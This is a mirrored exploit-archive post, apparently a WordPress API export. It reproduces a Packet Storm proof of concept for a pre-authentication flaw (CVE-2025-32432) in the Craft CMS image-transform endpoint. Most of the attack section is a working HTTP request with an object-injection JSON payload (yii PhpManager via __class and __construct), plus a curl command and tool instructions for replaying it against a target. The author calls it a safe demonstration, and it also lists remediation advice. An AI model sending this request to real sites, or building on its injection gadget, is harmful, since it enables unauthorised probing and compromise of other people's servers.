{"id":29329,"date":"2025-12-08T10:42:48","date_gmt":"2025-12-08T10:42:48","guid":{"rendered":"http:\/\/localhost\/?p=29329"},"modified":"2025-12-08T10:42:48","modified_gmt":"2025-12-08T10:42:48","slug":"craft-cms-50-logic-flaw","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=29329","title":{"rendered":"\ud83d\udcc4 Craft CMS 5.0 Logic Flaw_PACKETSTORM:212538"},"content":{"rendered":"

{“lastseen”:”2025-12-08T16:29:23″,”description”:”A flaw in the Craft CMS image transform endpoint allows an unauthenticated attacker to trigger backend processing without prior authentication. While the original Metasploit module targeted remote code execution, this proof of concept does not execute…”,”published”:”2025-12-08T00:00:00″,”modified”:”2025-12-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Craft CMS 5.0 Logic Flaw”,”source”:””,”references”:””,”id”:”PACKETSTORM:212538″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-32432″],”sourceData”:”=============================================================================================================================================\\n | # Title : Craft CMS 5.0 Image Transform Authentication Logic Flaw |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/craftcms.com |\\n =============================================================================================================================================\\n \\n POC : \\n \\n [+] Description\\n \\n A flaw in the Craft CMS image transform endpoint allows an unauthenticated attacker\\n to trigger backend processing without prior authentication. \\n \\tWhile the original Metasploit module targeted RCE, (https:\/\/packetstorm.news\/files\/id\/190728\/ \\tCVE-2025-32432) \\n \\t\\n \\n This PoC does *not* execute code, does *not* write files, and does *not* inject\\n payloads. It only proves that the endpoint performs internal logic operations\\n without authentication.\\n \\n # Vulnerability Class\\n Authentication Bypass \u2192 Pre\u2011Auth Backend Processing\\n \\n # Impact\\n An attacker can:\\n – Trigger image transformation logic without logging in.\\n – Interact with backend components not intended for anonymous users.\\n – Validate the presence of the vulnerability safely without RCE.\\n \\n =====================================================================\\n POC :\\n =====================================================================\\n \\n Request :\\n ———\\n POST \/index.php?p=actions\/assets\/generate-transform HTTP\/1.1\\n Host: TARGET\\n Content-Type: application\/json\\n \\n {\\n \\”assetId\\”: 1,\\n \\”handle\\”: {\\n \\”width\\”: 100,\\n \\”height\\”: 100,\\n \\”as test\\”: {\\n \\”class\\”: \\”craft\\\\\\\\\\\\\\\\behaviors\\\\\\\\\\\\\\\\FieldLayoutBehavior\\”,\\n \\”__class\\”: \\”yii\\\\\\\\\\\\\\\\rbac\\\\\\\\\\\\\\\\PhpManager\\”,\\n \\”__construct()\\”: [\\n { \\”itemFile\\”: \\”\/dev\/null\\” }\\n ]\\n }\\n }\\n }\\n \\n Effect :\\n ——–\\n – The server processes the transform request.\\n – The endpoint responds with a JSON transformation result.\\n – This demonstrates the pre-auth processing weakness.\\n – No execution, no payload, no harmful operations.\\n \\n =====================================================================\\n How to Save \\u0026 Use the PoC :\\n =====================================================================\\n \\n 1. Save the request into a file named:\\n craftcms_pre_auth_poc.txt\\n \\n 2. Use curl to replay the PoC (legal environments only):\\n curl -X POST \\\\\\n -H \\”Content-Type: application\/json\\” \\\\\\n -d @craftcms_pre_auth_poc.txt \\\\\\n https:\/\/TARGET\/index.php?p=actions\/assets\/generate-transform\\n \\n 3. Expected safe behavior:\\n The server processes the request and responds with JSON even though\\n the attacker is not authenticated.\\n \\n 4. Tools that can import the PoC:\\n – Burp Suite Repeater\\n – OWASP ZAP\\n – Postman Raw HTTP\\n \\n =====================================================================\\n # Recommendation\\n – Require authentication on all asset transformation endpoints.\\n – Validate input types before passing them to backend behavior handlers.\\n – Apply the vendor patch immediately once available.\\n \\n =====================================================================\\n # Disclosure Timeline\\n – Original discovery: Orange Cyberdefense CSIRT\\n – Educational safe PoC adaptation: indoushka\\n – Status: Safe demonstration (no execution)\\n =====================================================================\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212538″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212538\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-08T16:29:23″,”description”:”A flaw in the Craft CMS image transform endpoint allows an unauthenticated attacker to trigger backend processing without prior authentication. While the original Metasploit module…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-29329","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Craft CMS 5.0 Logic Flaw_PACKETSTORM:212538 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=29329\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Craft CMS 5.0 Logic Flaw_PACKETSTORM:212538 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-08T16:29:23″,”description”:”A flaw in the Craft CMS image transform endpoint allows an unauthenticated attacker to trigger backend processing without prior authentication. While the original Metasploit module...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=29329\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-08T10:42:48+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29329#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29329\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Craft CMS 5.0 Logic Flaw_PACKETSTORM:212538\",\"datePublished\":\"2025-12-08T10:42:48+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29329\"},\"wordCount\":595,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29329#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29329\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29329\",\"name\":\"\ud83d\udcc4 Craft CMS 5.0 Logic Flaw_PACKETSTORM:212538 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-08T10:42:48+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29329#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29329\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29329#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Craft CMS 5.0 Logic Flaw_PACKETSTORM:212538\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Craft CMS 5.0 Logic Flaw_PACKETSTORM:212538 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=29329","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Craft CMS 5.0 Logic Flaw_PACKETSTORM:212538 - zero redgem","og_description":"{“lastseen”:”2025-12-08T16:29:23″,”description”:”A flaw in the Craft CMS image transform endpoint allows an unauthenticated attacker to trigger backend processing without prior authentication. While the original Metasploit module...","og_url":"https:\/\/zero.redgem.net\/?p=29329","og_site_name":"zero redgem","article_published_time":"2025-12-08T10:42:48+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=29329#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=29329"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Craft CMS 5.0 Logic Flaw_PACKETSTORM:212538","datePublished":"2025-12-08T10:42:48+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=29329"},"wordCount":595,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-10.0","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=29329#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=29329","url":"https:\/\/zero.redgem.net\/?p=29329","name":"\ud83d\udcc4 Craft CMS 5.0 Logic Flaw_PACKETSTORM:212538 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-08T10:42:48+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=29329#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=29329"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=29329#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Craft CMS 5.0 Logic Flaw_PACKETSTORM:212538"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29329","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=29329"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29329\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=29329"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=29329"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=29329"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}